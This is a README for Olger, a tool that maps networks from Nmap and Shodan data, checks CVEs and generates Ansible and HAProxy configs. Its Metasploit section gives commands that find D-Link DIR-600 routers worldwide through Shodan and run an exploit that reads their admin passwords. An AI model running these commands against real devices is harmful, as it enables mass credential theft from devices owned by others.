Olger Nmap D3.js data visualizer with CVE check and ansible inventories smart generation.

Local python webserver for graph visualization with D3.js .

Uses www.cvdetails.com to identify Cyber Security Vulnerabilities .

Sends data to elasticsearch and visualizes in kibana .

Ansible inventory generation, group inventory per software type

Graphviz export, export pdf and .dot files

Shodan api

Generates HAPROXY configs for protect big networks

Metasploit integration

Ansible playbooks

Because we are tired and we not want to work, we have created olger, for those who have to create infinite inventories in giant infrastructures and have controlled the safety of the machines, from launching a patch to installing and hardening servers or HAP balancers. Make pretty security scans and reports doing nothing.

In the most of the big infrastructures they have a lot of internal services to manage his infrastructures, for do that , normally nobody thinks in the security, you can ping to your neighbors, scan them, a lot of trafic aren't encrypted, a lot s passwords in plain ...

The timing to repair or modify things is extremlly bureaucratized, and normally is by hand going to the machines and making the changes, we want to work less , this is the reason for olger, keep your organization controlled in security terms, repair fast and in a easy way, and keep your network isolated.

The information collected with this tool can be illegal in some countries, sometimes can expose big infrastructures to a dangerous consequences if you publish something, take care on that, this tool sends non malicious packets around the network to check connectivity and other cybersecurity issues. Can be used for bad things, please don't do that

Execute command:

git clone https://github.com/pedroelbanquero/olger.git

cd olger


chmod +x ./install


./install

Usage: ./olger [OPTION ...] [foo] [bar]

Olger a Red Team tool with ansible playbooks to repair things , D3.js Graph visualization, metasploit, shodan, kibana and elasticsearch.

Options:

-h, --help          display this usage message and exit

-n, --genfromnmap  [RANGE] [MISSION]     delete things

-f, --genfromfile [FILE] generate a graph from nmap xml file

-s, --genfromshodan [QUERY] write output to file

-m, --msfconsole [EXPLOIT_CHECK] [PAYLOAD] [CMD] [LIST] execute msf command for each input in the list

-r, --report [MISSION] write output to file in pdf and dot format

-p, --hapgen [DATAFILE] Generate haproxy configuration

-q, --query [DIR] [QUERY] make querys over raw json or csv data (not ready)

-a, --ansible [INVENTORY] [PLAYBOOK] Execture ansible playbooks

-l, --ansible-list playbooks , List all available playbooks

Execute command:

cd olger

chmod +x olger (first time only)

./olger -n 192.168.0.1-255 name-mission

Outputs:

• cvedetails.cve , a csv format with vulneravilities in the network
• web/graphs/data.json, a compatible D3.js json graph data format
• reports/reportNameMission.txt, a plaint text data report in txt format
• web server in port 8000, serving D3.js interactive graph
• elasticsearch with tls push

Execute command:

cd olger

chmod +x olger (Just first time)

./olger -r ./web/graphs/data.json name-mission

Outputs:

• reports/nameMission/namemission.pdf
• reports/nameMission/namemission.dot

Install elastic search and kibana

./scripts/install_elk.sh

./scripts/setup_certs_elk.sh yourdomaindotcomorlocaldomain

Edit scripts/olger_lib.py

Change the auth parameters in the file, elastic and authkey and the url of your elastic service, for example https://yourdomain.com:9200 , remember use tls encryption in your server to prevent expose data in the network.

def elkpush(indexdat,jsondat):

        es = Elasticsearch(
                ['host.domain'],
                scheme="https",
                verify_certs=False,
                http_auth=('elastic', 'auth-key'),
		port=9200
	)
	print(es.index(index=indexdat,doc_type="security_report", body=json.dumps(jsondat)))

Uncomment line 225 (remove #)

 #print(elkpush("box_"+sys.argv[2],toelastic))
 

Import dashboard file network_devices.ndjson in your kibana.

Go to Kibana
Click on Management
Click on Saved Objects
Click on the Import button
Browse the exported file
You will then be prompted: "If any of the objects already exist, do you want to automatically overwrite them?" and you will be given the following options:
    No, prompt me for each one
    Yes, overwrite all

The motivation to do this after scan a network is make simple the network hardening any where, cut all connections between devices and redirect all trafic to de haproxy, this keeps the network splited and prevents comunications between devices, redirecting all network services in a central point, balanced to higth disponibility . Solve a lot of problems, and encrypt all the network with the minium deployment in the infrastructure, works in parallel while people is testing and one time is ready with a simple ip table rules , the entire network is isolated

olger -p data/internal_services.csv

Outputs:

• data/haproxy.conf

Csv file format

iphaproxy,domainname,http,ipbackend,portbackend,urlredirect

Edit scripts/shodan.js

Add your api key

var client = new ShodanClient({ key: '' });

Execution

./olger -s "your search here"

Outputs:

• lists/query , a ip:port list to automathize tasks

Just a line with the exploit to use, the payload, the command and the list to apply each metasploit command. Be carefully and don't use if you don't know how or for bad purposes.

-m, --msfconsole [EXPLOIT_CHECK] [PAYLOAD] [CMD] [LIST] execute msf command for each input in the list

./olger -m exploits/dlink "" "cat /var/passwd" "lists/dir600v2.12

Is just an example never do in real world

Getting shells anywhere or execute commands in remote hosts.

./olger -s "dir 600 v2.12"

./olger -m exploits/dlink "" "cat /var/passwd" "lists/dir600v2.12

This example search all dlink routers in the world and show his remote administrator password (Not do if you aren't the owner of the devices or you have permit)

Please don't use for deploy botnets, hack corporations or goverments.

Add any line to cronjobs file /etc/crontab for scheduled tasks

0 2 * * * /olgerfolder/olger -n 192.168.0.1-255

Example to execute task all days at 2 am

Explore the network with browser view and D3.js Graph

Make a plain text report with cvdetails connection

Export pretty report to PDF and DOT files.

Send data to elastic search and import our Dashboard in KIBANA

My most sincere gratitude and recognition to Olger T., who has taught me about cybersecurity these months.

My most sincere gratitude and recognition to Angel L. and his cybersecurity company, who allow me to join to this world

Just you can use for non proffit activities, never for commercial use, distribution part of the content for comercial purposes or make any kind of proffit are forbbiden,

Talk with the authors for that.